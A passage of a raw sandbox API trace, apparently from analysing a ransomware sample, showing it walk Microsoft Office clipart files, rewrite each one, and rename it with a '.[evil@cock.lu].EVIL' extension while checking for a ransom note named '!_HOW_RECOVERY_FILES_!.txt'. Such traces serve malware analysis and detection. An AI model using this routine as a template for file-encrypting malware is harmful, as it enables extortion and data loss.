files\\microsoft office\\root\\clipart\\pub60cor\\j0107328.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107328.wmf.[evil@cock.lu].evil")) returned 1 [0141.693] ??_V@YAXPEAX@Z () returned 0x1 [0141.696] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF", dwFileAttributes=0x200) returned 0 [0141.696] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.696] wcsstr (_Str="J0107342.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.696] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF") returned 69 [0141.696] wcscmp (_String1="J0107342.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.696] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107342.WMF") returned 0x0 [0141.696] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF") returned 0x45 [0141.697] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107342.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.698] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1094, lpOverlapped=0x0) returned 1 [0141.701] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.701] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.701] _errno () returned 0x84b1160840 [0141.701] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.701] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x10a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x10a0, lpOverlapped=0x0) returned 1 [0141.701] CloseHandle (hObject=0x1a8) returned 1 [0141.701] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.701] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.701] __uncaught_exception () returned 0x84b1160800 [0141.701] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.702] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107342.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107342.wmf.[evil@cock.lu].evil")) returned 1 [0141.719] ??_V@YAXPEAX@Z () returned 0x1 [0141.722] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF", dwFileAttributes=0x200) returned 0 [0141.722] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.722] wcsstr (_Str="J0107344.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.722] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF") returned 69 [0141.722] wcscmp (_String1="J0107344.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.722] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107344.WMF") returned 0x0 [0141.722] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF") returned 0x45 [0141.722] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107344.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.724] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x13d4, lpOverlapped=0x0) returned 1 [0141.727] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.727] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.727] _errno () returned 0x84b1160840 [0141.727] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.727] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x13e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x13e0, lpOverlapped=0x0) returned 1 [0141.728] CloseHandle (hObject=0x1a8) returned 1 [0141.728] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.728] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.728] __uncaught_exception () returned 0x84b1160800 [0141.728] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.728] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107344.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107344.wmf.[evil@cock.lu].evil")) returned 1 [0141.729] ??_V@YAXPEAX@Z () returned 0x1 [0141.731] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF", dwFileAttributes=0x200) returned 0 [0141.732] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.732] wcsstr (_Str="J0107350.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.732] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF") returned 69 [0141.732] wcscmp (_String1="J0107350.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.732] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107350.WMF") returned 0x0 [0141.732] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF") returned 0x45 [0141.732] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107350.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.733] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5c78, lpOverlapped=0x0) returned 1 [0141.739] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.739] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.739] _errno () returned 0x84b1160840 [0141.739] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.739] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x5c80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5c80, lpOverlapped=0x0) returned 1 [0141.740] CloseHandle (hObject=0x1a8) returned 1 [0141.740] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.741] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.741] __uncaught_exception () returned 0x84b1160800 [0141.741] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.741] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107350.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107350.wmf.[evil@cock.lu].evil")) returned 1 [0141.742] ??_V@YAXPEAX@Z () returned 0x1 [0141.744] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF", dwFileAttributes=0x200) returned 0 [0141.744] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.744] wcsstr (_Str="J0107358.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.745] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF") returned 69 [0141.745] wcscmp (_String1="J0107358.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.745] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107358.WMF") returned 0x0 [0141.745] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF") returned 0x45 [0141.745] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107358.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.746] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1f1c, lpOverlapped=0x0) returned 1 [0141.751] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.751] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.751] _errno () returned 0x84b1160840 [0141.751] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.751] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x1f20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1f20, lpOverlapped=0x0) returned 1 [0141.751] CloseHandle (hObject=0x1a8) returned 1 [0141.751] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.751] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.752] __uncaught_exception () returned 0x84b1160800 [0141.752] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.752] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107358.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107358.wmf.[evil@cock.lu].evil")) returned 1 [0141.753] ??_V@YAXPEAX@Z () returned 0x1 [0141.755] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF", dwFileAttributes=0x200) returned 0 [0141.756] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.756] wcsstr (_Str="J0107364.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.756] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107364.WMF") returned 69 [0141.756] wcscmp (_String1="J0107364.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.756] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107364.WMF") returned 0x0 [0141.756] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107364.WMF") returned 0x45 [0141.756] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107364.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107364.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.758] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x40cc, lpOverlapped=0x0) returned 1 [0141.844] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.844] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.844] _errno () returned 0x84b1160840 [0141.844] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.844] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x40e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x40e0, lpOverlapped=0x0) returned 1 [0141.844] CloseHandle (hObject=0x1a8) returned 1 [0141.844] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107364.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.845] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.845] __uncaught_exception () returned 0x84b1160800 [0141.845] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.845] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107364.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107364.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107364.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107364.wmf.[evil@cock.lu].evil")) returned 1 [0141.846] ??_V@YAXPEAX@Z () returned 0x1 [0141.849] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107364.WMF", dwFileAttributes=0x200) returned 0 [0141.849] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.849] wcsstr (_Str="J0107426.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.849] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107426.WMF") returned 69 [0141.849] wcscmp (_String1="J0107426.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.849] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107426.WMF") returned 0x0 [0141.849] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107426.WMF") returned 0x45 [0141.849] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107426.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107426.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.852] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2ce4, lpOverlapped=0x0) returned 1 [0141.903] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.903] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.904] _errno () returned 0x84b1160840 [0141.904] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.904] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x2d00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2d00, lpOverlapped=0x0) returned 1 [0141.904] CloseHandle (hObject=0x1a8) returned 1 [0141.904] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107426.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.904] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.904] __uncaught_exception () returned 0x84b1160800 [0141.904] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.905] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107426.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107426.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107426.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107426.wmf.[evil@cock.lu].evil")) returned 1 [0141.905] ??_V@YAXPEAX@Z () returned 0x1 [0141.908] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107426.WMF", dwFileAttributes=0x200) returned 0 [0141.908] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.908] wcsstr (_Str="J0107446.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.908] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107446.WMF") returned 69 [0141.908] wcscmp (_String1="J0107446.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.908] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107446.WMF") returned 0x0 [0141.908] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107446.WMF") returned 0x45 [0141.908] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107446.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107446.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.910] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7680, lpOverlapped=0x0) returned 1 [0141.926] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.926] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.926] _errno () returned 0x84b1160840 [0141.926] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.926] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x76a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x76a0, lpOverlapped=0x0) returned 1 [0141.927] CloseHandle (hObject=0x1a8) returned 1 [0141.927] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107446.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.927] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.927] __uncaught_exception () returned 0x84b1160800 [0141.927] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.927] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107446.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107446.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107446.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107446.wmf.[evil@cock.lu].evil")) returned 1 [0141.928] ??_V@YAXPEAX@Z () returned 0x1 [0141.931] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107446.WMF", dwFileAttributes=0x200) returned 0 [0141.931] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.931] wcsstr (_Str="J0107450.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.931] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107450.WMF") returned 69 [0141.931] wcscmp (_String1="J0107450.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.931] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107450.WMF") returned 0x0 [0141.931] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107450.WMF") returned 0x45 [0141.931] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107450.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107450.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.933] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1338, lpOverlapped=0x0) returned 1 [0141.942] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.942] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.942] _errno () returned 0x84b1160840 [0141.942] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.942] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x1340, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1340, lpOverlapped=0x0) returned 1 [0141.942] CloseHandle (hObject=0x1a8) returned 1 [0141.942] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107450.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.943] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.943] __uncaught_exception () returned 0x84b1160800 [0141.943] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.943] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107450.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107450.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107450.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107450.wmf.[evil@cock.lu].evil")) returned 1 [0141.944] ??_V@YAXPEAX@Z () returned 0x1 [0141.947] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107450.WMF", dwFileAttributes=0x200) returned 0 [0141.947] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: 